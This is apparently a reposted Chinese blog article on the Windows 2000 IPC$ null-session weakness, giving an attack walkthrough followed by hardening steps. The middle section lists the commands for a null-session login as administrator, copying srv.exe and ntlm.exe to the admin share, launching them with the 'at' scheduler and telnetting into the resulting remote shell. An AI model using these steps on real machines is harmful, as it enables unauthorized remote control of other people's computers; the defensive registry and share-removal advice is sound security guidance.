博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
拒绝背后黑手的窥探IPC$漏洞大揭秘
阅读量:6424 次
发布时间:2019-06-23

本文共 2397 字,大约阅读时间需要 7 分钟。

常常在网上听人说IPC漏洞,那么IPC漏洞到底是什么呢?网络**们是怎么利用这个漏洞的呢?抱着这样的问题,我们一起来看看笔者带来的精彩文章! 

 

什么是IPC漏洞 

 

IPC是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们还可以得到目标主机上的用户列表。但是,一些别有用心者会利用IPC,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。 

 

如何利用IPC漏洞 

 

攻击者在这里一般会用到《流光》这个软件,兔子在这里特别提醒你,《流光》是一款功能非常强大的软件,在我们使用时一定要注意,不得进行非法破坏! 

 

第一步:运行《流光》(现在的最新版本是4.6),按“CTRL+R”键弹出扫描框,我们这里只是做个测试,目的是告诉大家这个漏洞的危害,所以我们现在随便选择一段IP进行扫描。我们扫描的是127.0.0.1(如图),其它的均使用默认,不需要改变设置。 

 

第二步:大家打开Win2000自带的命令提示行,注:这里我们不是教大家怎么破坏,只是给大家介绍这个漏洞的危害,所以下面的IP是假设的,并不存在。 

 

1. C:\>net use \\127.0.0.1\IPC "" /user:"admintitrators" 

 

这就是刚才用《流光》扫到的用户名是administrators,密码为“空”的IP地址,如果是攻击者的话,他就会用这样的命令来与127.0.0.1建立一个连接,因为密码为“空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 

 

2. C:\>copy srv.exe \\127.0.0.1\admin 

 

先复制srv.exe上去,在流光的Tools目录下就有(这里的是指admin用户的c:\winnt\system32\,大家还可以使用c、d,意思是C盘与D盘,这看你要复制到什么地方去了)。 

 

3. C:\>net time \\127.0.0.1 

 

查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。 

 

4. C:\>at \\127.0.0.1 11:05 srv.exe 

 

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 

 

5. C:\>net time \\127.0.0.1 

 

再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。 

 

6. C:\>telnet 127.0.0.1 99 

 

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 

 

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了。 

 

7.C:\>copy ntlm.exe \\127.0.0.1\admin 

 

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 

 

8. C:\WINNT\system32>ntlm 

 

输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务! 

 

第三步:我们使用Telnet到对方计算机上去,Telnet 127.0.0.1,接着输入用户名与密码就进入了,操作就像在DOS上操作一样简单! 

 

如何防范IPC漏洞 

 

看了上面的方法是不是觉得该检测一下自己是否有这个漏洞,如果有,还不赶快把这个漏洞给补上?跟我来吧,下面我们将教你如何防范IPC漏洞的入侵 

 

1.禁止建立空连接 

 

我们首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001。 

 

2.禁止管理共享 

 

同样也是找到如下组键[HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer = DWORD的键值改为:00000000。 

 

3.到[url]http://www.heibai.net/download/show.php?id=2194&down=1[/url]下载delshare.zip。该工具能自动永久删除Windows 2000所有默认共享的两个批处理文件。 

 

4.如果还觉得麻烦的话,也可以把“net share ipc /delete”放进你的启动栏里。 

 

5.当然,最简单的方法就是把的密码设置得复杂一些,以免被一些不怀好意的人使用工具破解出来。不过想提醒大家一点,任何复杂的密码都有可能被破解。

本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8406 ,如需转载请自行联系原作者

你可能感兴趣的文章
巧用美女照做微信吸粉,你会做吗?
查看>>
wcf学习总结《上》
查看>>
ERROR (ClientException)
查看>>
WYSIWYG 网页在线编辑器比较表
查看>>
vss团队开发工具使用(个人学习心得)
查看>>
Load Balance 产品横向比较
查看>>
Java代理程序实现web方式管理邮件组成员
查看>>
【编译打包】tengine 1.5.1 SRPM
查看>>
看图说话:手动清除病毒文件流程
查看>>
一句话下拖库
查看>>
Deploy Office Communications Server 2007R2 Group Chat Server(二)
查看>>
在Cacti上实现MSN报警机制
查看>>
如何对C++虚基类构造函数
查看>>
XFire WebService开发快速起步
查看>>
JavaScript 函数replace揭秘
查看>>
QTP解决内嵌IE窗体方法2
查看>>
“王子”的演讲:N828印象
查看>>
判断JS字符串中是否包含某些字符
查看>>
Phalanger---PHP的.NET编译器
查看>>
Scanner----java控制台和文件读取的利器(java 5新增)
查看>>